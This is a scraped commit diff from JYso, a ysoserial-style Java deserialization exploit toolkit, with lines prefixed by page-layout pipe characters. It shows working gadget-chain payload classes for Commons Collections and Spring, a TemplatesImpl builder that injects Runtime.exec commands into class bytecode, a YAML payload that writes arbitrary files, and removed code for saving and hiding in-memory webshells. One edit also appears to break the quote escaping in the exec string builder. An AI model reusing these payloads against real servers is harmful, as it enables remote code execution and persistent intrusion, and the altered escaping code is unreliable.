InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
||||||
HashMap<String, String> innerMap = new HashMap<String, String>();
|
HashMap<String, String> innerMap = new HashMap<>();
|
||||||
Map m = LazyMap.decorate(innerMap, transformer);
|
Map m = LazyMap.decorate(innerMap, transformer);
|
||||||
Map outerMap = new HashMap();
|
Map outerMap = new HashMap();
|
||||||
TiedMapEntry tied = new TiedMapEntry(m, templates);
|
TiedMapEntry tied = new TiedMapEntry(m, templates);
|
||||||
|
|||||||
@@ -10,6 +10,7 @@ import org.apache.commons.collections4.map.LazyMap;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:4.0"})
|
@Dependencies({"commons-collections:commons-collections:4.0"})
|
||||||
public class cck2 implements ReleaseableObjectPayload<Object> {
|
public class cck2 implements ReleaseableObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -18,7 +19,7 @@ public class cck2 implements ReleaseableObjectPayload<Object> {
|
|||||||
|
|
||||||
templates = Gadgets.createTemplatesImpl(command);
|
templates = Gadgets.createTemplatesImpl(command);
|
||||||
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
||||||
HashMap<String, String> innerMap = new HashMap<String, String>();
|
HashMap<String, String> innerMap = new HashMap<>();
|
||||||
Map m = LazyMap.lazyMap(innerMap, transformer);
|
Map m = LazyMap.lazyMap(innerMap, transformer);
|
||||||
Map outerMap = new HashMap();
|
Map outerMap = new HashMap();
|
||||||
TiedMapEntry tied = new TiedMapEntry(m, templates);
|
TiedMapEntry tied = new TiedMapEntry(m, templates);
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ import org.apache.commons.collections.map.LazyMap;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.MATTHIASKAISER})
|
@Authors({Authors.MATTHIASKAISER})
|
||||||
public class cck3 implements ObjectPayload<Object> {
|
public class cck3 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ import org.apache.commons.collections4.map.LazyMap;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:4.0"})
|
@Dependencies({"commons-collections:commons-collections:4.0"})
|
||||||
@Authors({Authors.MATTHIASKAISER})
|
@Authors({Authors.MATTHIASKAISER})
|
||||||
public class cck4 implements ObjectPayload<Object> {
|
public class cck4 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -21,9 +21,11 @@ import java.net.URL;
|
|||||||
import java.net.URLClassLoader;
|
import java.net.URLClassLoader;
|
||||||
import java.util.ArrayList;
|
import java.util.ArrayList;
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
import java.util.Objects;
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class springFs implements ObjectPayload<Object>, Serializable {
|
public class springFs implements ObjectPayload<Object>, Serializable {
|
||||||
public static ClassPool pool = ClassPool.getDefault();
|
public static ClassPool pool = ClassPool.getDefault();
|
||||||
// jdk7下使用badAttributeValueExpException,jdk8以上使用xString可打高版本JDK(jdk17)
|
// jdk7下使用badAttributeValueExpException,jdk8以上使用xString可打高版本JDK(jdk17)
|
||||||
@@ -31,14 +33,14 @@ public class springFs implements ObjectPayload<Object>, Serializable {
|
|||||||
// 低版本Spring-beans <5.3 -8835275493235412717
|
// 低版本Spring-beans <5.3 -8835275493235412717
|
||||||
// 高版本Spring-beans >=5.3 -1515767093960859525"
|
// 高版本Spring-beans >=5.3 -1515767093960859525"
|
||||||
public String serialVersionUID = "-1515767093960859525";
|
public String serialVersionUID = "-1515767093960859525";
|
||||||
private Object inv;
|
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|
||||||
Object obj = Gadgets.createTemplatesImpl(command);
|
Object obj = Gadgets.createTemplatesImpl(command);
|
||||||
|
|
||||||
if (this.serialVersionUID == "-1515767093960859525") {
|
Object inv;
|
||||||
|
if (Objects.equals(this.serialVersionUID, "-1515767093960859525")) {
|
||||||
|
|
||||||
CtClass ctClass;
|
CtClass ctClass;
|
||||||
try {
|
try {
|
||||||
@@ -54,21 +56,21 @@ public class springFs implements ObjectPayload<Object>, Serializable {
|
|||||||
try {
|
try {
|
||||||
CtField field = ctClass.getDeclaredField("serialVersionUID");
|
CtField field = ctClass.getDeclaredField("serialVersionUID");
|
||||||
ctClass.removeField(field);
|
ctClass.removeField(field);
|
||||||
} catch (NotFoundException e) {
|
} catch (NotFoundException ignored) {
|
||||||
}
|
}
|
||||||
ctClass.addField(CtField.make("private static final long serialVersionUID = " + serialVersionUID + "L;", ctClass));
|
ctClass.addField(CtField.make("private static final long serialVersionUID = " + serialVersionUID + "L;", ctClass));
|
||||||
Class<?> aClass = ctClass.toClass(new URLClassLoader(new URL[0]), null);
|
Class<?> aClass = ctClass.toClass(new URLClassLoader(new URL[0]), null);
|
||||||
this.inv = Reflections.createWithoutConstructor(aClass);
|
inv = Reflections.createWithoutConstructor(aClass);
|
||||||
ctClass.defrost();
|
ctClass.defrost();
|
||||||
} else {
|
} else {
|
||||||
this.inv = Reflections.createWithoutConstructor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
|
inv = Reflections.createWithoutConstructor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
|
||||||
}
|
}
|
||||||
HashMap<String, Object> hashMap = new HashMap<>();
|
HashMap<String, Object> hashMap = new HashMap<>();
|
||||||
hashMap.put("object", obj);
|
hashMap.put("object", obj);
|
||||||
JSONObject jsonObject = new JSONObject(hashMap);
|
JSONObject jsonObject = new JSONObject(hashMap);
|
||||||
Object o2 = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[]{ObjectFactory.class}, jsonObject);
|
Object o2 = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[]{ObjectFactory.class}, jsonObject);
|
||||||
Reflections.setFieldValue(this.inv, "objectFactory", o2);
|
Reflections.setFieldValue(inv, "objectFactory", o2);
|
||||||
Object o = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[]{Templates.class}, (InvocationHandler) this.inv);
|
Object o = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[]{Templates.class}, (InvocationHandler) inv);
|
||||||
JSONArray jsonArray = new JSONArray();
|
JSONArray jsonArray = new JSONArray();
|
||||||
jsonArray.add(o);
|
jsonArray.add(o);
|
||||||
if (this.toString.equals("xString")) {
|
if (this.toString.equals("xString")) {
|
||||||
|
|||||||
@@ -21,6 +21,7 @@ import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.generateClass;
|
|||||||
import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.shrinkBytes;
|
import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.shrinkBytes;
|
||||||
import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
|
import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class Gadgets extends ClassLoader {
|
public class Gadgets extends ClassLoader {
|
||||||
public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
|
public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
|
||||||
public static Class<?> TPL_CLASS = TemplatesImpl.class;
|
public static Class<?> TPL_CLASS = TemplatesImpl.class;
|
||||||
|
|||||||
@@ -3,42 +3,8 @@ package com.qi4l.JYso.gadgets.utils;
|
|||||||
import java.io.EOFException;
|
import java.io.EOFException;
|
||||||
import java.io.IOException;
|
import java.io.IOException;
|
||||||
import java.io.InputStream;
|
import java.io.InputStream;
|
||||||
import java.security.MessageDigest;
|
|
||||||
import java.security.NoSuchAlgorithmException;
|
|
||||||
import java.util.Formatter;
|
|
||||||
|
|
||||||
public class HexUtils {
|
public class HexUtils {
|
||||||
public static String generatePassword(String password) {
|
|
||||||
String md5Str = getMD5(password);
|
|
||||||
if (md5Str != null) {
|
|
||||||
return md5Str.substring(0, 16).toLowerCase();
|
|
||||||
}
|
|
||||||
|
|
||||||
// 如果生成出错,则使用 p@ssw0rd
|
|
||||||
return "0f359740bd1cda99";
|
|
||||||
}
|
|
||||||
|
|
||||||
public static String getMD5(String str) {
|
|
||||||
// 生成一个MD5加密计算摘要
|
|
||||||
MessageDigest md;
|
|
||||||
try {
|
|
||||||
md = MessageDigest.getInstance("MD5");
|
|
||||||
md.update(str.getBytes());
|
|
||||||
return toHexString(md.digest());
|
|
||||||
} catch (NoSuchAlgorithmException ignored) {
|
|
||||||
}
|
|
||||||
return null;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static String toHexString(byte[] bytes) {
|
|
||||||
Formatter formatter = new Formatter();
|
|
||||||
for (byte b : bytes) {
|
|
||||||
formatter.format("%02x", b);
|
|
||||||
}
|
|
||||||
String res = formatter.toString();
|
|
||||||
formatter.close();
|
|
||||||
return res;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static byte[] toByteArray(InputStream in) throws IOException {
|
public static byte[] toByteArray(InputStream in) throws IOException {
|
||||||
byte[] classBytes;
|
byte[] classBytes;
|
||||||
|
|||||||
@@ -2,7 +2,6 @@ package com.qi4l.JYso.gadgets.utils;
|
|||||||
|
|
||||||
|
|
||||||
import com.caucho.hessian.io.*;
|
import com.caucho.hessian.io.*;
|
||||||
import com.qi4l.JYso.gadgets.Config.Config;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.utf8OverlongEncoding.UTF8OverlongObjectOutputStream;
|
import com.qi4l.JYso.gadgets.utils.utf8OverlongEncoding.UTF8OverlongObjectOutputStream;
|
||||||
import org.springframework.jndi.support.SimpleJndiBeanFactory;
|
import org.springframework.jndi.support.SimpleJndiBeanFactory;
|
||||||
|
|
||||||
@@ -15,6 +14,7 @@ import java.util.concurrent.Callable;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.Config.Config.*;
|
import static com.qi4l.JYso.gadgets.Config.Config.*;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class Serializer implements Callable<byte[]> {
|
public class Serializer implements Callable<byte[]> {
|
||||||
public static Boolean globalinline = false;
|
public static Boolean globalinline = false;
|
||||||
private final Object object;
|
private final Object object;
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ import java.io.Serializable;
|
|||||||
|
|
||||||
import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
|
import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class TemplatesUtil {
|
public class TemplatesUtil {
|
||||||
public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
|
public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
|
||||||
|
|
||||||
@@ -61,11 +62,11 @@ public class TemplatesUtil {
|
|||||||
}
|
}
|
||||||
|
|
||||||
sb.append('"');
|
sb.append('"');
|
||||||
sb.append(arg.replaceAll("\"", "\\\""));
|
sb.append(arg.replaceAll("\"", "\""));
|
||||||
sb.append('"');
|
sb.append('"');
|
||||||
}
|
}
|
||||||
|
|
||||||
clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(new String[] { " + sb.toString() + " });");
|
clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(new String[] { " + sb + " });");
|
||||||
// sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
|
// sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
|
||||||
clazz.setName("ysoserial.Pwner" + System.nanoTime());
|
clazz.setName("ysoserial.Pwner" + System.nanoTime());
|
||||||
CtClass superC = pool.get(abstTranslet.getName());
|
CtClass superC = pool.get(abstTranslet.getName());
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import java.util.Map;
|
|||||||
import org.slf4j.Logger;
|
import org.slf4j.Logger;
|
||||||
import org.slf4j.LoggerFactory;
|
import org.slf4j.LoggerFactory;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class ThirdLibsClassLoader extends URLClassLoader {
|
public class ThirdLibsClassLoader extends URLClassLoader {
|
||||||
public static final String thirdLibDir = "chains-config/third-libs";
|
public static final String thirdLibDir = "chains-config/third-libs";
|
||||||
private static final String commonDir = "common";
|
private static final String commonDir = "common";
|
||||||
@@ -85,7 +86,7 @@ public class ThirdLibsClassLoader extends URLClassLoader {
|
|||||||
log.debug("Add common lib: {}", url);
|
log.debug("Add common lib: {}", url);
|
||||||
loader.addURL(url);
|
loader.addURL(url);
|
||||||
}
|
}
|
||||||
log.info("Loaded {} libraries from common directory", Integer.valueOf(jarUrls.size()));
|
log.info("Loaded {} libraries from common directory", jarUrls.size());
|
||||||
return loader;
|
return loader;
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -97,9 +98,9 @@ public class ThirdLibsClassLoader extends URLClassLoader {
|
|||||||
List<URL> jarUrls = new ArrayList<>();
|
List<URL> jarUrls = new ArrayList<>();
|
||||||
findJarFiles(dir, jarUrls);
|
findJarFiles(dir, jarUrls);
|
||||||
if (!jarUrls.isEmpty()) {
|
if (!jarUrls.isEmpty()) {
|
||||||
ThirdLibsClassLoader dirClassLoader = new ThirdLibsClassLoader((URL[]) jarUrls.toArray(new URL[0]), INSTANCE);
|
ThirdLibsClassLoader dirClassLoader = new ThirdLibsClassLoader(jarUrls.toArray(new URL[0]), INSTANCE);
|
||||||
pluginClassLoaderMap.put(dir.getName(), dirClassLoader);
|
pluginClassLoaderMap.put(dir.getName(), dirClassLoader);
|
||||||
log.info("Loaded {} libraries from directory: {}", Integer.valueOf(jarUrls.size()), dir.getName());
|
log.info("Loaded {} libraries from directory: {}", jarUrls.size(), dir.getName());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -5,7 +5,8 @@ import javassist.CannotCompileException;
|
|||||||
import javassist.ClassPool;
|
import javassist.ClassPool;
|
||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import org.apache.commons.codec.binary.Base64;
|
import org.apache.commons.codec.binary.Base64;
|
||||||
import org.apache.commons.lang.StringUtils;
|
import org.slf4j.Logger;
|
||||||
|
import org.slf4j.LoggerFactory;
|
||||||
|
|
||||||
import java.io.*;
|
import java.io.*;
|
||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
@@ -15,8 +16,6 @@ import java.util.Random;
|
|||||||
import java.util.zip.Deflater;
|
import java.util.zip.Deflater;
|
||||||
import java.util.zip.GZIPOutputStream;
|
import java.util.zip.GZIPOutputStream;
|
||||||
|
|
||||||
import com.sun.rowset.JdbcRowSetImpl;
|
|
||||||
|
|
||||||
import java.io.InputStream;
|
import java.io.InputStream;
|
||||||
import java.lang.reflect.*;
|
import java.lang.reflect.*;
|
||||||
import java.util.*;
|
import java.util.*;
|
||||||
@@ -27,7 +26,10 @@ import static com.qi4l.JYso.gadgets.utils.handle.ClassMethodHandler.insertMethod
|
|||||||
import static com.qi4l.JYso.gadgets.utils.handle.ClassNameHandler.generateClassName;
|
import static com.qi4l.JYso.gadgets.utils.handle.ClassNameHandler.generateClassName;
|
||||||
import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.shrinkBytes;
|
import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.shrinkBytes;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class Utils {
|
public class Utils {
|
||||||
|
private static final Logger log = LoggerFactory.getLogger(Utils.class);
|
||||||
|
|
||||||
public static Map<String, Object> createMap(final String key, final Object val) {
|
public static Map<String, Object> createMap(final String key, final Object val) {
|
||||||
final Map<String, Object> map = new HashMap<>();
|
final Map<String, Object> map = new HashMap<>();
|
||||||
map.put(key, val);
|
map.put(key, val);
|
||||||
@@ -86,7 +88,7 @@ public class Utils {
|
|||||||
return new String[]{par1, par2};
|
return new String[]{par1, par2};
|
||||||
}
|
}
|
||||||
|
|
||||||
public static String base64Decode(String bs) throws Exception {
|
public static String base64Decode(String bs) {
|
||||||
Class<?> base64;
|
Class<?> base64;
|
||||||
byte[] value = null;
|
byte[] value = null;
|
||||||
try {
|
try {
|
||||||
@@ -112,15 +114,6 @@ public class Utils {
|
|||||||
// 总体在进行类字节码的缩短
|
// 总体在进行类字节码的缩短
|
||||||
shrinkBytes(ctClass);
|
shrinkBytes(ctClass);
|
||||||
byte[] classBytes = ctClass.toBytecode();
|
byte[] classBytes = ctClass.toBytecode();
|
||||||
|
|
||||||
// 保存内存马文件
|
|
||||||
if (GEN_MEM_SHELL) {
|
|
||||||
if (StringUtils.isNotEmpty(GEN_MEM_SHELL_FILENAME)) {
|
|
||||||
writeClassToFile(GEN_MEM_SHELL_FILENAME, classBytes);
|
|
||||||
} else {
|
|
||||||
writeClassToFile(ctClass.getName(), classBytes);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
public static void loadClassTest(byte[] classBytes, String className) throws Exception {
|
public static void loadClassTest(byte[] classBytes, String className) throws Exception {
|
||||||
@@ -323,7 +316,7 @@ public class Utils {
|
|||||||
in.read(FileContent);
|
in.read(FileContent);
|
||||||
in.close();
|
in.close();
|
||||||
} catch (FileNotFoundException e) {
|
} catch (FileNotFoundException e) {
|
||||||
e.printStackTrace();
|
log.error("e: ", e);
|
||||||
}
|
}
|
||||||
byte[] compressBytes = compress(FileContent);
|
byte[] compressBytes = compress(FileContent);
|
||||||
return "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"" + destPath + "\"],false],!!java.util.zip.Inflater { input: !!binary " + Utils.base64Encode(compressBytes) + " },1048576]]";
|
return "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"" + destPath + "\"],false],!!java.util.zip.Inflater { input: !!binary " + Utils.base64Encode(compressBytes) + " },1048576]]";
|
||||||
@@ -337,7 +330,7 @@ public class Utils {
|
|||||||
compresser.reset();
|
compresser.reset();
|
||||||
compresser.setInput(data);
|
compresser.setInput(data);
|
||||||
compresser.finish();
|
compresser.finish();
|
||||||
ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
|
try (ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length)) {
|
||||||
try {
|
try {
|
||||||
byte[] buf = new byte[1024];
|
byte[] buf = new byte[1024];
|
||||||
while (!compresser.finished()) {
|
while (!compresser.finished()) {
|
||||||
@@ -347,13 +340,10 @@ public class Utils {
|
|||||||
output = bos.toByteArray();
|
output = bos.toByteArray();
|
||||||
} catch (Exception e) {
|
} catch (Exception e) {
|
||||||
output = data;
|
output = data;
|
||||||
e.printStackTrace();
|
log.error("e: ", e);
|
||||||
} finally {
|
|
||||||
try {
|
|
||||||
bos.close();
|
|
||||||
} catch (IOException e) {
|
|
||||||
e.printStackTrace();
|
|
||||||
}
|
}
|
||||||
|
} catch (IOException e) {
|
||||||
|
log.error("e: ", e);
|
||||||
}
|
}
|
||||||
compresser.end();
|
compresser.end();
|
||||||
return output;
|
return output;
|
||||||
|
|||||||
@@ -6,14 +6,6 @@ import com.qi4l.JYso.gadgets.utils.Utils;
|
|||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import javassist.CtMethod;
|
import javassist.CtMethod;
|
||||||
import javassist.NotFoundException;
|
import javassist.NotFoundException;
|
||||||
import org.apache.commons.lang.StringUtils;
|
|
||||||
|
|
||||||
import java.util.ArrayList;
|
|
||||||
import java.util.Arrays;
|
|
||||||
import java.util.List;
|
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.handle.ClassFieldHandler.converString;
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.handle.ClassFieldHandler.insertField;
|
|
||||||
|
|
||||||
public class ClassMethodHandler {
|
public class ClassMethodHandler {
|
||||||
/**
|
/**
|
||||||
|
|||||||
@@ -107,12 +107,6 @@ public class ClassNameHandler {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
public static String getHumanName(String className, String suffix) {
|
|
||||||
className = className.substring(className.lastIndexOf('.') + 1);
|
|
||||||
className = Character.toLowerCase(className.charAt(0)) + className.substring(1);
|
|
||||||
return className + suffix;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
public static String searchClassByName(String name) {
|
public static String searchClassByName(String name) {
|
||||||
Set<String> set = getClassSet("com.qi4l.JYso.template.");
|
Set<String> set = getClassSet("com.qi4l.JYso.template.");
|
||||||
|
|||||||
@@ -4,7 +4,6 @@ import com.qi4l.JYso.gadgets.Config.Config;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Utils;
|
import com.qi4l.JYso.gadgets.utils.Utils;
|
||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import javassist.bytecode.*;
|
import javassist.bytecode.*;
|
||||||
import org.apache.commons.codec.binary.Base64;
|
|
||||||
|
|
||||||
import java.nio.file.Files;
|
import java.nio.file.Files;
|
||||||
import java.nio.file.Paths;
|
import java.nio.file.Paths;
|
||||||
@@ -39,44 +38,6 @@ public class GlassHandler {
|
|||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public static CtClass generateClass(Class<?> clazz, String shellType, String newClassName) throws Exception {
|
|
||||||
|
|
||||||
CtClass ctClass;
|
|
||||||
byte[] byteCodes;
|
|
||||||
|
|
||||||
String exClassName = clazz.getName();
|
|
||||||
ctClass = Config.POOL.get(exClassName);
|
|
||||||
|
|
||||||
// 为 DefineClassFromParameter 添加自定义函数功能
|
|
||||||
ClassFieldHandler.insertFieldIfExists(ctClass, "parameter", "public static String parameter = " + ClassFieldHandler.converString(Config.PARAMETER) + ";");
|
|
||||||
|
|
||||||
// 为类设置新的类名
|
|
||||||
ctClass.setName(newClassName);
|
|
||||||
|
|
||||||
shrinkBytes(ctClass);
|
|
||||||
byteCodes = ctClass.toBytecode();
|
|
||||||
|
|
||||||
if (Config.HIDE_MEMORY_SHELL) {
|
|
||||||
switch (Config.HIDE_MEMORY_SHELL_TYPE) {
|
|
||||||
case 1:
|
|
||||||
break;
|
|
||||||
case 2:
|
|
||||||
CtClass newClass = Config.POOL.get("com.qi4l.JYso.template.HideMemShellTemplate");
|
|
||||||
newClass.setName(ClassNameHandler.generateClassName());
|
|
||||||
String content = "b64=\"" + Base64.encodeBase64String(byteCodes) + "\";";
|
|
||||||
String cName = "className=\"" + ctClass.getName() + "\";";
|
|
||||||
newClass.defrost();
|
|
||||||
newClass.makeClassInitializer().insertBefore(content);
|
|
||||||
newClass.makeClassInitializer().insertBefore(cName);
|
|
||||||
|
|
||||||
ctClass = newClass;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
return ctClass;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
// 统一处理,删除一些不影响使用的 Attribute 降低类字节码的大小
|
// 统一处理,删除一些不影响使用的 Attribute 降低类字节码的大小
|
||||||
public static void shrinkBytes(CtClass ctClass) {
|
public static void shrinkBytes(CtClass ctClass) {
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user